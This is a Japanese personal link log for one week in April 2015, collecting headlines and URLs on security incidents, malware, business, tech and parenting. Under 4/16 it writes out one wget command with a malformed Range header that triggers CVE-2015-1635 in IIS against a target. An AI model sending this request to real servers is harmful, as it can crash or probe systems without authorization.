2015年16週目(4/13〜4/17)
=================================================
4/13
=================================================
中国、サイバー攻撃システム「Great Cannon」を実戦配備
GitHub攻撃について分析した研究チームは「国家レベルの情報操作が大幅にエスカレートしたことを物語る」と研究チームは解説する。
[鈴木聖子,ITmedia]
http://www.itmedia.co.jp/enterprise/articles/1504/13/news041.html
中国が配備したというサイバー攻撃システムの構成(Citizen Labより)
http://image.itmedia.co.jp/l/im/enterprise/articles/1504/13/l_grcno01.jpg
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- -
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
インターネットバンキングに係るマルウェア(VAWTRAK)
感染端末利用者に対する注意喚起について
https://www.telecom-isac.jp/news/news20150410.html
国産セキュリティソフトを邪魔するマルウェア出現
ネットバンキングの不正送金に加担するトロイの木馬が、銀行サイトでセキュリティソフトの導入メッセージを妨害するという。
http://www.itmedia.co.jp/enterprise/articles/1409/18/news158.html
イオンの最終利益7.7%減。1位セブンとの差拡大
http://economic.jp/?p=48464
国土交通省調べ、住宅及び居住環境に「不満」22.1%
http://suumo.jp/journal/2015/04/13/82057/?vos=nsuusbsp20111206001
いつまでに対処すれば良いのか、なぜ新規ビジネスが必要なのか:ITソリューション塾:オルタナティブ・ブログ
http://blogs.itmedia.co.jp/itsolutionjuku/2015/04/post_66.html
阿川佐和子さん-プロ論。-/リクナビNEXT[転職サイト]
http://next.rikunabi.com/proron/1210/proron_1210.html
アップルに匹敵の企業、日本に拠点準備…菅長官 : 政治 : 読売新聞(YOMIURI ONLINE)
http://www.yomiuri.co.jp/politics/20150411-OYT1T50136.html?from=tw …
@shiumachi
ベイエリアの企業で働く日本人、昔よりかなり増えたと思うし情報もオープンになってると思うので、多分想像よりも遥かにハードル低いと思う。いい時代になったものだ。ベイエリア系の企業で働きたいと思う日本人は恐れずに飛び込んでみてください
https://twitter.com/shiumachi/status/587461355822678016
LIFESTYLE
外資系・敏腕コンサルが語る! 仕事がデキる人が実践している「7つのコト」
http://tabi-labo.com/88805/good-worker/
連載:激変!世界のエアライン最新事情
LCC専用「成田空港第3ターミナル」の使い勝手を徹底検証!
2015年04月13日
http://trendy.nikkeibp.co.jp/article/column/20150409/1063609/?rss
13歳の少年、中国の2011年世界一のスパコンに侵入。認証無しWifiからLANに侵入しSSHにブルートフォースであっさり侵入。権限設定の不備で、任意のノードにタスクを振ることが可能、shellshock脆弱性有り
http://thalys.hatenablog.com/entry/2015/04/10/170611
2015/04/08 6:43 pm ET
日米、国民同士の信頼感は強固=米調査
http://realtime.wsj.com/japan/2015/04/08/%E6%97%A5%E7%B1%B3%E3%80%81%E5%9B%BD%E6%B0%91%E5%90%8C%E5%A3%AB%E3%81%AE%E4%BF%A1%E9%A0%BC%E6%84%9F%E3%81%AF%E5%BC%B7%E5%9B%BA%EF%BC%9D%E7%B1%B3%E8%AA%BF%E6%9F%BB/?mod=WSJBlog
「FFR yarai 脆弱性攻撃防御機能」の販売・サポート終了、「yarai」へ集約(FFRI)
2015年4月10日(金) 17時43分
http://scan.netsecurity.ne.jp/article/2015/04/10/36175.html
子どもにプログラミングする喜びを教えてくれる小さなロボット「Codie」
スマートフォンアプリと連携して、子どもたちにコーディングの原則を教えるおもちゃのロボット「Codie」。小さな箱形ロボットは、自分の命令通りになにかを動かすという喜びを通して、小さな“メイカー”たちを養成してくれるはずだ。
http://wired.jp/2015/04/12/codie/
2015.4.10 FRI
グーグル、「ネタバレ回避システム」の特許を取得
http://wired.jp/2015/04/10/google-spoiler-warning-system/
Apr 11
Kjw0rm VBS Malware Tied To Attacks on French TV Station TV5Monde
http://blog.trendmicro.com/trendlabs-security-intelligence/vbs-malware-tied-to-media-attacks/
Apr 10
Digital Certificates: Who Can You Trust?
http://blog.trendmicro.com/trendlabs-security-intelligence/digital-certificates-who-can-you-trust/
Apr 8
Windows XP – It’s Not Dead Yet
http://blog.trendmicro.com/trendlabs-security-intelligence/windows-xp-its-not-dead-yet/
redditのCEO、男女の給与を公平にするため雇用時の給与交渉は行わない
http://it.slashdot.jp/story/15/04/11/2022254/
トレンド・フォーカス
“カロゴン”のように若者を狙いつつ王道路線も確保! トヨタ「カローラ」マイナーチェンジ
2015年04月13日
http://trendy.nikkeibp.co.jp/article/pickup/20150410/1063642/
時間帯に応じて自動車道のセンターラインを移動する特殊車両 Zippers
http://developer.cybozu.co.jp/akky/2015/04/caltrans-zippers-change-lane-dinamically/
VBS_KJWORM.SMA
http://about-threats.trendmicro.com/Malware.aspx?language=jp&name=VBS_KJWORM.SMA
サポート終了から1年、いまだ多くの企業で利用されるWindows XP
http://blog.trendmicro.co.jp/archives/11264
日本を標的とする新たなオンライン銀行詐欺ツール「WERDLOD」の手口を解説
http://blog.trendmicro.co.jp/archives/11258
2011年に確認済の脆弱性「CVE-2011-2461」が抱えるリスク
http://blog.trendmicro.co.jp/archives/11245
Apr 12
SIMDA: A Botnet Takedown
http://blog.trendmicro.com/trendlabs-security-intelligence/simda-a-botnet-takedown/
ネットバンキングを狙う新ウイルス「WERDLOD」
http://is702.jp/news/1750/
Twitter Dev
https://dev.twitter.com/
サーバー仮想化、ネットワーク仮想化/SDN、クラウド、仮想デスクトップを盛り込む
港区立幼稚園/小中学校の共有システム基盤、NECが構築
2015年04月07日 14時00分更新
http://ascii.jp/elem/000/000/996/996709/?mail
ビッグデータと機械学習で標的型攻撃対策、ダンバラが日本進出
2015年04月08日 06時00分更新
http://ascii.jp/elem/000/000/997/997141/
学校ICT最前線、iPadを活用したスーパーサイエンスハイスクールの教育とは?
http://www.lifehacker.jp/2015/04/150413apple_ssh.html
FIPS PUB 140-2 - Effective 15-Nov-2001
http://csrc.nist.gov/groups/STM/cmvp/standards.html#02
Microsoft は Azure アプリケーションサービスを App Service に統合した
http://www.infoq.com/jp/news/2015/04/microsoft-azure-app-service?utm_campaign=infoq_content&utm_source=infoq&utm_medium=feed&utm_term=global
ドメイン駆動設計とは - 金融取引アプリケーションを例に
http://www.infoq.com/jp/news/2015/04/ddd-trading-example?utm_campaign=infoq_content&utm_source=infoq&utm_medium=feed&utm_term=global
「インシデントレスポンスサービス」の提供を全世界に拡大(シマンテック)
2015年4月13日(月) 18時43分
http://scan.netsecurity.ne.jp/article/2015/04/13/36183.html
Rebuild fm 87
Using the Crashlytics Kit
http://rebuild.fm/87/
==================================================
@hyuki: 何か話せとお題をもらったときに、否定から始める人と、肯定から始める人がいる。「でも」から会話を始める人と「なるほど」から会話を始める人の違いだ。あなたは、どっちと話をしたい?
@hyuki: とツイートして気づいた。数学ガールの「僕」はほとんど相手を否定しないな。相手の発言に「なるほど」や「そうだね」と受けることが多い。
=================================================
4/14
=================================================
2015/04/14 14:06
美を追い求める者は、必ずや美を見出す / ビル・カニンガムの言葉より(文章を書く心がけ)
※全文を公開している「投げ銭」スタイルのノートです(結城メルマガVol.071より)
https://note.mu/hyuki/n/n99bedf3e294b
脳科学者 茂木健一郎博士の名言bot @k_mogi_bot · 4月10日
「世代論」を信じないし、「世代論」を振り回す人も、信用しない。人それぞれだと思うからだ。それで、MITの石井裕さん(@ishii_mit)は何歳だか知らないけれど、そのクロック数や好奇心など、ティーンエイジャー並だと思う。生物的に若くても年寄りじみたやつたくさんいる。
TEDxKidsChiyoda @TEDxKidsChiyoda 4月12日
【動画公開】
セキュリティ活動家 篠田 佳奈 「ハッカーズヴォイス:問題があるからなおそうよ!」
https://www.youtube.com/watch?v=fEj9BXX9oXs
ハッカーが世界に必要だ、という話
#TEDxKids #CODEBLUE #ハッカー
ますます、CODEBLUEが大きくなっていくと思われる。
podcast
https://isc.sans.edu/diary/ISC+StormCast+for+Tuesday%2C+April+14th+2015+http%3Aisc.sans.edupodcastdetail.html%3Fid%3D4439/19575
FIREEYE LABS / FIREEYE THREAT INTELLIGENCE
APT30 AND THE MECHANICS
OF A LONG-RUNNING CYBER ESPIONAGE OPERATION
How a Cyber Threat Group Exploited Governments and Commercial
Entities across Southeast Asia and India for over a Decade
[PDF]
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf
エクセルの「共有ブック」の仕方について
http://www.atmarkit.co.jp/ait/articles/1110/14/news152.html
日本も晒されるテロの脅威に自衛隊が出動する場合。治安対策はどこまでなされているのか
2015年04月14日 06時00分
http://yukan-news.ameba.jp/20150414-12/
Cisco Annual Security Report
http://www.cisco.com/web/offers/pdfs/cisco-asr-2015.pdf
radwareのセキュリティレベルについての紹介
Half Defense is No Defense
http://www.radware.com/half-defense/?utm_source=SC-Magazine-US&utm_medium=banner300x1050&utm_campaign=HalfDefense
MySQLをチューニング,そしてスケールアップ/スケールアウトへ
第6回 MySQLチューニング(5) パラメタチューニングの基礎
2015年4月14日
梶山隆輔
http://gihyo.jp/dev/serial/01/MySQL-tuning-scale/0006
エンジニアの生存戦略
第5回 蓑輪太郎―Twitter本社で働くエンジニアのキャリア
2015年4月13日
初出:WEB+DB PRESS Vol.85(2015年2月24日発売)
舘野祐一
http://gihyo.jp/lifestyle/serial/01/survival_strategy_engineer/0005
給料異変!? なぜファナックの年収は元親会社の富士通より高いのか
PRESIDENT Online
https://www.google.com/url?rct=j&sa=t&url=http://president.jp/articles/-/14995&ct=ga&cd=CAEYAyoUMTU1OTU1MTM4NTE5NDc0NDkxMjEyHDE0YWE1MTdjZGU3YzJjY2Q6Y28uanA6amE6SlA&usg=AFQjCNG2WW4APh66m0qAse-1P0VBpnnOLg
How to survive security conferences: 4 tips for the socially anxious
=================================================
4/15
=================================================
IoT取り組み、年度内に規制見直しやガイドライン策定=産構審
http://jp.reuters.com/article/topNews/idJPKBN0N609T20150415?feedType=RSS&feedName=topNews&utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+reuters%2FJPTopNews+%28News+%2F+JP+%2F+Top+News%29
クラウド基盤サービス「KDDI クラウドプラットフォームサービス」のカスタマーコントローラ「Admin Console」を拡張
http://news.kddi.com/kddi/business-topic/2015/04/1070.html
さくらインターネット、さくらのクラウド「東京リージョン」を提供開始
〜94種類の豊富なサーバラインアップを取り揃え、石狩リージョンとも接続可能〜
http://sakura.ad.jp/press/2015/0415_cloud-tokyoregion/
ブルーコート、Global Intelligence Networkの統合を発表 高度な脅威に対し、これまで以上に効果的な防御、検出、対応を実現
http://digitalpr.jp/r/11180
ECサイトの個人情報はなぜ狙われるのか 「セキュリティは全員参加」アラタナ×さくらインターネット対談
http://markezine.jp/article/detail/22295
スマホをロックして身代金を要求 激増する新サイバー攻撃
2015/04/14
日川 佳三=ライター (筆者執筆記事一覧)
http://itpro.nikkeibp.co.jp/atcl/news/15/041401305/
マイナンバー対応は「そんなに難しくない」:
オラクルセキュリティ担当者が語る、データを守るためのポイント
2015年4月9日、10日に開催された「Oracle CloudWorld Tokyo 2015」に合わせて来日した、米オラクルのセキュリティ関連製品の責任者、ポール・ニーダム氏に、「データ」を中心としたセキュリティ対策の在り方について尋ねてみた。
[高橋睦美,@IT]
http://www.atmarkit.co.jp/ait/articles/1504/15/news017.html
ECサイトの個人情報はなぜ狙われるのか 「セキュリティは全員参加」アラタナ×さくらインターネット対談
http://markezine.jp/article/detail/22295
海外で成功する「コンビニ」の秘訣・・・「セブン・イレブン」の戦略にある!
http://biz.searchina.net/id/1569480
=================================================
4/16
=================================================
極限まで集中する「ハイパーフォーカス」状態を生み出しタスクを25分以内にやりきるようにするための「Esington Glass」レビュー
http://gigazine.net/news/20150416-esington-glass-review/
http://d.hatena.ne.jp/Kango/20150415/1429115441
CVE-2015-1635
の実行コマンド
wget --header="Range: bytes=18-18446744073709551615" [target]/welcome.png
2015年04月13日 23時00分20秒
質問を繰り返すことで論理的な考え方を身につける「ソクラテス式問答法」の実践方法とは?
http://gigazine.net/news/20150413-socratic-method/
「やることリスト」の逆、「やらないことリスト」の重要性
http://gigazine.net/news/20150412-forget-to-do-list/
2015年4月16日木曜日
Time-based SQL Injectionは意外に実用的だった
http://blog.tokumaru.org/2015/04/time-based-sql-injection.html
米宝くじ協会の従業員、当選場号を決めるPCをハックして不正に当たりを引いていた?
ストーリー by hylom 2015年04月16日 13時47分
自分で買わずに番号を売れば足が付きにくかったのでは 部門より
http://slashdot.jp/story/15/04/16/0418243/
=================================================
4/17
=================================================
tidal jay-z beyonce
http://listen.tidalhifi.com/video/44631570
飛行機のはかば
http://jp.reuters.com/news/oddlyEnough/rpSlideshows?articleId=JPRTR4XM77#a=1
東京都がイチ押し 整備効果が高い「鉄道5路線」
(1/3ページ)
2015/4/17 6:30
http://www.nikkei.com/article/DGXMZO85333410W5A400C1000000/
ソフトバンクも「iPhone 6」値上げ 各社の価格を比較 - ニュース タブロイド
http://top.tsite.jp/news/o/23173700/
浜田雅功の子育て論を尾木ママが絶賛 父親を絶対的存在にすることを重要視
http://news.livedoor.com/article/detail/10012803/
「住みたい街」と「子育てしたい街」が違う理由
http://dot.asahi.com/aera/2015041600039.html
<みんなで解決!子育てカフェ>イヤイヤ期がやってきた
http://www.kobe-np.co.jp/news/kurashi/201504/0007928534.shtml
子育て女性 就職支援施設
http://www.yomiuri.co.jp/local/tokyotama/news/20150416-OYTNT50393.html
スカーレット・ヨハンソン、セレブが子育てについて語るのは「大嫌い」!?
昨年9月に女の子を出産したスカーレット・ヨハンソン。子育てエピソードをほとんど語らない彼女がその理由を明らかにしつつ、パパ&ママセレブたちを一喝!
http://www.elle.co.jp/culture/celebgossip/scarlett-johansson_15_0416
「有名人が子育てについて偉そうに語るのは大嫌い!」とコメントしたそう。理由は「個人的なものだから。私はみんなよりも子育てについて知っているなんていうつもりはないわ」と語ったそう。この発言が、誰を思い浮かべながらのものなのかが気になるところ!
2014.11.27 11:00更新
【鼓動2014】
中国「ハッカー育成学校」経営危機 米紙報道で最大スポンサー「軍」から見捨てられ
http://www.sankei.com/world/news/141127/wor1411270001-n1.html
Linux・Windows・Mac・ネットワーク・プログラム等をメインに書いてます
http://orebibou.com/2014/09/linux%E3%81%A7%E3%83%8D%E3%83%83%E3%83%88%E3%83%AF%E3%83%BC%E3%82%AF%E3%81%AE%E7%9B%A3%E8%A6%96%E3%82%92%E8%A1%8C%E3%81%88%E3%82%8B%E3%83%A2%E3%83%8B%E3%82%BF%E3%83%AA%E3%83%B3%E3%82%B0%E3%82%B3/
〜〜〜〜〜〜〜〜〜〜〜〜〜
Sony Pictures Condemns Wikileaks Release of Documents From Hackers
http://www.whatlauderdale.com/technology/sony-pictures-condemns-wikileaks-release-documents-hackers/11365/
The release of 32,287 documents and 173,137 emails on WikiLeaks makes the information widely searchable and available.
国際連携強化でサイバー攻撃に対応を=韓国外交部長官
http://japanese.yonhapnews.co.kr/Politics2/2015/04/17/0900000000AJP20150417000800882.HTML
また、開発途上国にサイバーセキュリティーと関連した政策支援などを行う「グローバル情報保護センター」(GCCD)を年内に設立する計画を明らかにした。
今回の会議は4回目で、過去最大規模となる約90カ国・地域から約1700人が参加した。前回は2013年、アジア太平洋地域では初めて韓国で開かれた。
サイバー攻撃、官民で対策を=国際会議が閉幕−オランダ
http://www.jiji.com/jc/c?g=soc_30&k=2015041700523
クーンデルス同国外相は閉幕に際し、サイバー空間でのセキュリティー確保の問題について「最善策を国際的に共有する取り組みを促進すべきだ」と述べ、各国の協力体制の強化を訴えた。
会議には中山泰秀外務副大臣ら約100カ国から1600人が参加。次回会議は2017年にメキシコで開催される。(2015/04/17-22:32)
ベルギー、10代の容疑者2人聴取 地元紙へサイバー攻撃
http://www.sankei.com/world/news/150418/wor1504180013-n1.html
ハッカー集団、161の中国政府サイトを攻撃、5千アカウント情報漏えい
http://www.epochtimes.jp/jp/2015/04/html/d69240.html
国際的ハッカー集団「アノニマス」は最近、161の中国政府系サイトシステムに侵入し、5千ものアカウント情報を漏えいさせたと公表した。
ハッカーは、ツイッターやハッカー集団などが利用する情報交換サイトPastebin.comで攻撃を告知した。「数人のハクティビスト(ハッキング活動家)は中国政府に逮捕され、迫害されている」「5人の活動家が混沌とする中国で逮捕された。このような(ハッキング)抗議は、最も平和的手段の1つだ」「すべての市民には、意見する権利がなければならない」と記した。
